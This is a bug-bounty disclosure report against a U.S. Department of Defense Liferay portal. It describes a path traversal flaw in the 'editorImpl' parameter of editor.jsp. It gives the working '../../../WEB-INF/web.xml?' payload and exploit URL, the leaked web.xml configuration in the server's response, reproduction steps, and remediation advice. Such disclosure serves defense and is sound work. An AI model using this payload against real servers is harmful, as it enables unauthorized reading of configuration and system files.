U.S. Dept Of Defense: Path traversal on ████████

2017-03-30T20:55:32
ID H1:217344
Type hackerone
Reporter twicedi
Modified 2019-10-04T15:23:01

Description

Summary: The web application hosted on the "█████████" domain is affected by a path traversal vulnerability that could permit to an attacker to include arbirtary files that are outside of the restricted directory.

Description: The affected handler is the "/html/js/editor/editor.jsp". This handler receives, through the "editorImpl" parameter, an input from the user to construct a pathname that is intended to identify a file, but the web app does not properly neutralize "dot-dot-slash (../)" within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory as showed in the following example in which the web.xml configuration file is included:

Example of payload: > ../../../WEB-INF/web.xml?

URL: (Note: the last question mark char ("?") is necessary to exploit the vulnerability otherwise an error is triggered, with a full stacktrace) https://████/html/js/editor/editor.jsp?editorImpl=../../../WEB-INF/web.xml?

``` HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Thu, 30 Mar 2017 20:24:43 GMT Connection: close Content-Length: 54193

<?xml version="1.0"?>

<web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.4" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"> <context-param> <param-name>contextClass</param-name> <param-value>com.liferay.portal.spring.context.PortalApplicationContext</param-value> </context-param> <context-param> <param-name>contextConfigLocation</param-name> <param-value/> </context-param> <context-param> <param-name>com.ibm.websphere.portletcontainer.PortletDeploymentEnabled</param-name> <param-value>false</param-value> </context-param> <filter> <filter-name>Absolute Redirects Filter</filter-name> <filter-class>com.liferay.portal.servlet.filters.absoluteredirects.AbsoluteRedirectsFilter</filter-class> </filter> <filter> <filter-name>Audit Filter</filter-name> <filter-class>com.liferay.portal.servlet.filters.audit.AuditFilter</filter-class> </filter> <filter> <filter-name>Auto Login Filter</filter-name> <filter-class>com.liferay.portal.servlet.filters.autologin.AutoLoginFilter</filter-class> </filter> <filter>

[REDACTED...]

&lt;filter&gt;
    &lt;filter-name&gt;GZip Filter&lt;/filter-name&gt;
    &lt;filter-class&gt;com.liferay.portal.servlet.filters.gzip.GZipFilter&lt;/filter-class&gt;
&lt;/filter&gt;
&lt;filter&gt;
    &lt;filter-name&gt;GZip Filter - Theme PNG&lt;/filter-name&gt;
    &lt;filter-class&gt;com.liferay.portal.servlet.filters.gzip.GZipFilter&lt;/filter-class&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;url-regex-pattern&lt;/param-name&gt;
        &lt;param-value&gt;.+/themes/.*/images/.*\.png&lt;/param-value&gt;
    &lt;/init-param&gt;
&lt;/filter&gt;
&lt;filter&gt;
    &lt;filter-name&gt;Header Filter&lt;/filter-name&gt;
    &lt;filter-class&gt;com.liferay.portal.servlet.filters.header.HeaderFilter&lt;/filter-class&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;url-regex-ignore-pattern&lt;/param-name&gt;
        &lt;param-value&gt;.+/-/.+&lt;/param-value&gt;
    &lt;/init-param&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;Cache-Control&lt;/param-name&gt;
        &lt;param-value&gt;max-age=315360000, public&lt;/param-value&gt;
    &lt;/init-param&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;Expires&lt;/param-name&gt;
        &lt;param-value&gt;315360000&lt;/param-value&gt;
    &lt;/init-param&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;Vary&lt;/param-name&gt;
        &lt;param-value&gt;Accept-Encoding&lt;/param-value&gt;
    &lt;/init-param&gt;
&lt;/filter&gt;
&lt;filter&gt;
    &lt;filter-name&gt;Header Filter - JSP&lt;/filter-name&gt;
    &lt;filter-class&gt;com.liferay.portal.servlet.filters.header.HeaderFilter&lt;/filter-class&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;url-regex-pattern&lt;/param-name&gt;
        &lt;param-value&gt;.+/(barebone|css|everything|main)\.jsp&lt;/param-value&gt;
    &lt;/init-param&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;Cache-Control&lt;/param-name&gt;
        &lt;param-value&gt;max-age=315360000, public&lt;/param-value&gt;
    &lt;/init-param&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;Expires&lt;/param-name&gt;
        &lt;param-value&gt;315360000&lt;/param-value&gt;
    &lt;/init-param&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;Vary&lt;/param-name&gt;
        &lt;param-value&gt;Accept-Encoding&lt;/param-value&gt;
    &lt;/init-param&gt;
&lt;/filter&gt;

[REDACTED...]

&lt;filter&gt;
    &lt;filter-name&gt;Minifier Filter&lt;/filter-name&gt;
    &lt;filter-class&gt;com.liferay.portal.servlet.filters.minifier.MinifierFilter&lt;/filter-class&gt;
&lt;/filter&gt;
&lt;filter&gt;
    &lt;filter-name&gt;Minifier Filter - JSP&lt;/filter-name&gt;
    &lt;filter-class&gt;com.liferay.portal.servlet.filters.minifier.MinifierFilter&lt;/filter-class&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;url-regex-pattern&lt;/param-name&gt;
        &lt;param-value&gt;.+/(barebone|css|everything|main)\.jsp&lt;/param-value&gt;
    &lt;/init-param&gt;
&lt;/filter&gt;
&lt;filter&gt;
    &lt;filter-name&gt;Monitoring Filter&lt;/filter-name&gt;
    &lt;filter-class&gt;com.liferay.portal.servlet.filters.monitoring.MonitoringFilter&lt;/filter-class&gt;
&lt;/filter&gt;
&lt;filter&gt;
    &lt;filter-name&gt;Secure Main Servlet Filter&lt;/filter-name&gt;
    &lt;filter-class&gt;com.liferay.portal.servlet.filters.secure.SecureFilter&lt;/filter-class&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;portal_property_prefix&lt;/param-name&gt;
        &lt;param-value&gt;main.servlet.&lt;/param-value&gt;
    &lt;/init-param&gt;
&lt;/filter&gt;
&lt;filter&gt;
    &lt;filter-name&gt;Session Id Filter&lt;/filter-name&gt;
    &lt;filter-class&gt;com.liferay.portal.servlet.filters.sessionid.SessionIdFilter&lt;/filter-class&gt;
&lt;/filter&gt;
&lt;filter&gt;
    &lt;filter-name&gt;SSO CAS Filter&lt;/filter-name&gt;
    &lt;filter-class&gt;com.liferay.portal.servlet.filters.sso.cas.CASFilter&lt;/filter-class&gt;
&lt;/filter&gt;

[REDACTED...]

&lt;filter-mapping&gt;
    &lt;filter-name&gt;Sharepoint Filter&lt;/filter-name&gt;
    &lt;url-pattern&gt;/sharepoint/_vti_bin/_vti_aut/author.dll&lt;/url-pattern&gt;
&lt;/filter-mapping&gt;
&lt;filter-mapping&gt;
    &lt;filter-name&gt;Sharepoint Filter&lt;/filter-name&gt;
    &lt;url-pattern&gt;/sharepoint/_vti_bin/owssvr.dll&lt;/url-pattern&gt;
&lt;/filter-mapping&gt;
&lt;filter-mapping&gt;
    &lt;filter-name&gt;SSO CAS Filter&lt;/filter-name&gt;
    &lt;url-pattern&gt;/c/portal/login&lt;/url-pattern&gt;
    &lt;dispatcher&gt;REQUEST&lt;/dispatcher&gt;
    &lt;dispatcher&gt;FORWARD&lt;/dispatcher&gt;
&lt;/filter-mapping&gt;
&lt;filter-mapping&gt;
    &lt;filter-name&gt;SSO CAS Filter&lt;/filter-name&gt;
    &lt;url-pattern&gt;/c/portal/logout&lt;/url-pattern&gt;
    &lt;dispatcher&gt;REQUEST&lt;/dispatcher&gt;
    &lt;dispatcher&gt;FORWARD&lt;/dispatcher&gt;
&lt;/filter-mapping&gt;
&lt;filter-mapping&gt;
    &lt;filter-name&gt;SSO Ntlm Filter&lt;/filter-name&gt;
    &lt;url-pattern&gt;/c/portal/login&lt;/url-pattern&gt;
    &lt;dispatcher&gt;REQUEST&lt;/dispatcher&gt;
    &lt;dispatcher&gt;FORWARD&lt;/dispatcher&gt;
&lt;/filter-mapping&gt;
&lt;filter-mapping&gt;
    &lt;filter-name&gt;SSO Ntlm Post Filter&lt;/filter-name&gt;
    &lt;url-pattern&gt;/*&lt;/url-pattern&gt;
&lt;/filter-mapping&gt;

[REDACTED...]

&lt;filter-mapping&gt;
    &lt;filter-name&gt;Monitoring Filter&lt;/filter-name&gt;
    &lt;url-pattern&gt;/user/*&lt;/url-pattern&gt;
    &lt;dispatcher&gt;REQUEST&lt;/dispatcher&gt;
    &lt;dispatcher&gt;FORWARD&lt;/dispatcher&gt;
&lt;/filter-mapping&gt;
&lt;filter-mapping&gt;
    &lt;filter-name&gt;Monitoring Filter&lt;/filter-name&gt;
    &lt;url-pattern&gt;/web/*&lt;/url-pattern&gt;
    &lt;dispatcher&gt;REQUEST&lt;/dispatcher&gt;
    &lt;dispatcher&gt;FORWARD&lt;/dispatcher&gt;
&lt;/filter-mapping&gt;
&lt;listener&gt;
    &lt;listener-class&gt;com.liferay.portal.spring.context.PortalContextLoaderListener&lt;/listener-class&gt;
&lt;/listener&gt;
&lt;listener&gt;
    &lt;listener-class&gt;com.liferay.portal.servlet.PortalSessionListener&lt;/listener-class&gt;
&lt;/listener&gt;
&lt;listener&gt;
    &lt;listener-class&gt;com.liferay.portal.kernel.servlet.PortletSessionListenerManager&lt;/listener-class&gt;
&lt;/listener&gt;
&lt;listener&gt;
    &lt;listener-class&gt;com.liferay.portal.kernel.servlet.SerializableSessionAttributeListener&lt;/listener-class&gt;
&lt;/listener&gt;
&lt;listener&gt;
    &lt;listener-class&gt;com.liferay.portal.servlet.SharedSessionAttributeListener&lt;/listener-class&gt;
&lt;/listener&gt;
&lt;servlet&gt;
    &lt;servlet-name&gt;Web Server Servlet&lt;/servlet-name&gt;
    &lt;servlet-class&gt;mil.army.lwn.liferay.portal.webserver.WebServerServlet&lt;/servlet-class&gt;
    &lt;load-on-startup&gt;2&lt;/load-on-startup&gt;
&lt;/servlet&gt;
&lt;servlet&gt;
    &lt;servlet-name&gt;Main Servlet&lt;/servlet-name&gt;
    &lt;servlet-class&gt;com.liferay.portal.servlet.MainServlet&lt;/servlet-class&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;config&lt;/param-name&gt;
        &lt;param-value&gt;/WEB-INF/struts-config.xml,/WEB-INF/struts-config-ext.xml&lt;/param-value&gt;
    &lt;/init-param&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;debug&lt;/param-name&gt;
        &lt;param-value&gt;0&lt;/param-value&gt;
    &lt;/init-param&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;detail&lt;/param-name&gt;
        &lt;param-value&gt;0&lt;/param-value&gt;
    &lt;/init-param&gt;
    &lt;load-on-startup&gt;1&lt;/load-on-startup&gt;
&lt;/servlet&gt;
&lt;servlet&gt;
    &lt;servlet-name&gt;Combo Servlet&lt;/servlet-name&gt;
    &lt;servlet-class&gt;com.liferay.portal.servlet.ComboServlet&lt;/servlet-class&gt;
    &lt;load-on-startup&gt;2&lt;/load-on-startup&gt;
&lt;/servlet&gt;
&lt;servlet&gt;
    &lt;servlet-name&gt;Display Chart&lt;/servlet-name&gt;
    &lt;servlet-class&gt;com.liferay.portal.servlet.DisplayChartServlet&lt;/servlet-class&gt;
    &lt;load-on-startup&gt;2&lt;/load-on-startup&gt;
&lt;/servlet&gt;
&lt;servlet&gt;
    &lt;servlet-name&gt;Facebook Servlet&lt;/servlet-name&gt;
    &lt;servlet-class&gt;com.liferay.portal.facebook.FacebookServlet&lt;/servlet-class&gt;
    &lt;load-on-startup&gt;2&lt;/load-on-startup&gt;
&lt;/servlet&gt;
&lt;servlet&gt;
    &lt;servlet-name&gt;Friendly URL Servlet - Private Group&lt;/servlet-name&gt;
    &lt;servlet-class&gt;com.liferay.portal.servlet.FriendlyURLServlet&lt;/servlet-class&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;private&lt;/param-name&gt;
        &lt;param-value&gt;true&lt;/param-value&gt;
    &lt;/init-param&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;user&lt;/param-name&gt;
        &lt;param-value&gt;false&lt;/param-value&gt;
    &lt;/init-param&gt;
    &lt;load-on-startup&gt;2&lt;/load-on-startup&gt;
&lt;/servlet&gt;
&lt;servlet&gt;
    &lt;servlet-name&gt;Friendly URL Servlet - Private User&lt;/servlet-name&gt;
    &lt;servlet-class&gt;com.liferay.portal.servlet.FriendlyURLServlet&lt;/servlet-class&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;private&lt;/param-name&gt;
        &lt;param-value&gt;true&lt;/param-value&gt;
    &lt;/init-param&gt;
    &lt;init-param&gt;
        &lt;param-name&gt;user&lt;/param-name&gt;
        &lt;param-value&gt;true&lt;/param-value&gt;
    &lt;/init-param&gt;
    &lt;load-on-startup&gt;2&lt;/load-on-startup&gt;
&lt;/servlet&gt;

[REDACTED...]

&lt;servlet&gt;
    &lt;servlet-name&gt;XML-RPC Servlet&lt;/servlet-name&gt;
    &lt;servlet-class&gt;com.liferay.portal.xmlrpc.XmlRpcServlet&lt;/servlet-class&gt;
    &lt;load-on-startup&gt;2&lt;/load-on-startup&gt;
&lt;/servlet&gt;
&lt;servlet&gt;
    &lt;servlet-name&gt;Clean Up Servlet&lt;/servlet-name&gt;
    &lt;servlet-class&gt;com.liferay.portal.servlet.CleanUpServlet&lt;/servlet-class&gt;
    &lt;load-on-startup&gt;3&lt;/load-on-startup&gt;
&lt;/servlet&gt;
&lt;servlet-mapping&gt;
    &lt;servlet-name&gt;Main Servlet&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/c/*&lt;/url-pattern&gt;
&lt;/servlet-mapping&gt;
&lt;servlet-mapping&gt;
    &lt;servlet-name&gt;Combo Servlet&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/combo/*&lt;/url-pattern&gt;
&lt;/servlet-mapping&gt;
&lt;servlet-mapping&gt;
    &lt;servlet-name&gt;Display Chart&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/display_chart/*&lt;/url-pattern&gt;
&lt;/servlet-mapping&gt;
&lt;servlet-mapping&gt;
    &lt;servlet-name&gt;Facebook Servlet&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/facebook/*&lt;/url-pattern&gt;
&lt;/servlet-mapping&gt;
&lt;servlet-mapping&gt;
    &lt;servlet-name&gt;Friendly URL Servlet - Private Group&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/group/*&lt;/url-pattern&gt;
&lt;/servlet-mapping&gt;
&lt;servlet-mapping&gt;
    &lt;servlet-name&gt;Friendly URL Servlet - Private User&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/user/*&lt;/url-pattern&gt;
&lt;/servlet-mapping&gt;
&lt;servlet-mapping&gt;
    &lt;servlet-name&gt;Friendly URL Servlet - Public&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/web/*&lt;/url-pattern&gt;
&lt;/servlet-mapping&gt;
&lt;servlet-mapping&gt;
    &lt;servlet-name&gt;Google Gadget Servlet&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/google_gadget/*&lt;/url-pattern&gt;
&lt;/servlet-mapping&gt;

[REDACTED...]

&lt;servlet-mapping&gt;
    &lt;servlet-name&gt;Widget Servlet&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/widget/*&lt;/url-pattern&gt;
&lt;/servlet-mapping&gt;
&lt;servlet-mapping&gt;
    &lt;servlet-name&gt;XML-RPC Servlet&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/xmlrpc/*&lt;/url-pattern&gt;
&lt;/servlet-mapping&gt;
&lt;session-config&gt;
    &lt;session-timeout&gt;120&lt;/session-timeout&gt;
&lt;/session-config&gt;
&lt;welcome-file-list&gt;
    &lt;welcome-file&gt;index.html&lt;/welcome-file&gt;
    &lt;welcome-file&gt;index.jsp&lt;/welcome-file&gt;
&lt;/welcome-file-list&gt;
&lt;error-page&gt;
    &lt;error-code&gt;404&lt;/error-code&gt;
    &lt;location&gt;/errors/404.jsp&lt;/location&gt;
&lt;/error-page&gt;
&lt;jsp-config&gt;
    &lt;taglib&gt;
        &lt;taglib-uri&gt;http://displaytag.sf.net&lt;/taglib-uri&gt;
        &lt;taglib-location&gt;/WEB-INF/tld/displaytag.tld&lt;/taglib-location&gt;
    &lt;/taglib&gt;
    &lt;taglib&gt;
        &lt;taglib-uri&gt;http://java.sun.com/jsp/jstl/core&lt;/taglib-uri&gt;
        &lt;taglib-location&gt;/WEB-INF/tld/c.tld&lt;/taglib-location&gt;
    &lt;/taglib&gt;
    &lt;taglib&gt;
        &lt;taglib-uri&gt;http://java.sun.com/jsp/jstl/fmt&lt;/taglib-uri&gt;
        &lt;taglib-location&gt;/WEB-INF/tld/fmt.tld&lt;/taglib-location&gt;
    &lt;/taglib&gt;
    &lt;taglib&gt;
        &lt;taglib-uri&gt;http://java.sun.com/jsp/jstl/functions&lt;/taglib-uri&gt;
        &lt;taglib-location&gt;/WEB-INF/tld/fn.tld&lt;/taglib-location&gt;
    &lt;/taglib&gt;

[REDACTED...]

    &lt;taglib&gt;
        &lt;taglib-uri&gt;http://struts.apache.org/tags-tiles&lt;/taglib-uri&gt;
        &lt;taglib-location&gt;/WEB-INF/tld/struts-tiles.tld&lt;/taglib-location&gt;
    &lt;/taglib&gt;
    &lt;taglib&gt;
        &lt;taglib-uri&gt;http://struts.apache.org/tags-tiles-el&lt;/taglib-uri&gt;
        &lt;taglib-location&gt;/WEB-INF/tld/struts-tiles-el.tld&lt;/taglib-location&gt;
    &lt;/taglib&gt;
&lt;/jsp-config&gt;
&lt;security-constraint&gt;
    &lt;web-resource-collection&gt;
        &lt;web-resource-name&gt;/c/portal/protected&lt;/web-resource-name&gt;
        &lt;url-pattern&gt;/c/portal/protected&lt;/url-pattern&gt;
        &lt;url-pattern&gt;/ar/c/portal/protected&lt;/url-pattern&gt;

[REDACTED...]

        &lt;http-method&gt;GET&lt;/http-method&gt;
        &lt;http-method&gt;POST&lt;/http-method&gt;
    &lt;/web-resource-collection&gt;
    &lt;auth-constraint&gt;
        &lt;role-name&gt;users&lt;/role-name&gt;
    &lt;/auth-constraint&gt;
    &lt;user-data-constraint&gt;
        &lt;transport-guarantee&gt;NONE&lt;/transport-guarantee&gt;
    &lt;/user-data-constraint&gt;
&lt;/security-constraint&gt;
&lt;login-config&gt;
    &lt;auth-method&gt;FORM&lt;/auth-method&gt;
    &lt;realm-name&gt;PortalRealm&lt;/realm-name&gt;
    &lt;form-login-config&gt;
        &lt;form-login-page&gt;/c/portal/j_login&lt;/form-login-page&gt;
        &lt;form-error-page&gt;/c/portal/j_login_error&lt;/form-error-page&gt;
    &lt;/form-login-config&gt;
&lt;/login-config&gt;
&lt;security-role&gt;
    &lt;role-name&gt;users&lt;/role-name&gt;
&lt;/security-role&gt;

</web-app> ```

Impact

It may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.

Step-by-step Reproduction Instructions

  1. It’s possible to insert a malicious string as the "editorImpl" parameter of the following handler to access files that are outside of the restricted directory: (Note: the last question mark char ("?") is necessary to exploit the vulnerability otherwise an error is triggered, with a full stacktrace) https://██████████/html/js/editor/editor.jsp?editorImpl=../../../WEB-INF/web.xml?

Suggested Mitigation/Remediation Actions

It is advisable to: - Prefer working without user input when using file system calls - Use indexes rather than actual portions of file names when templating or using language files - Ensure the user cannot supply all parts of the path – surround it with your path code - Validate the user’s input by only accepting known good – do not sanitize the data - Use chrooted jails and code access policies to restrict where the files can be obtained or saved to - If forced to use user input for file operations, normalize the input before using in file io API's

I'm available for further clarification,

Best, Davide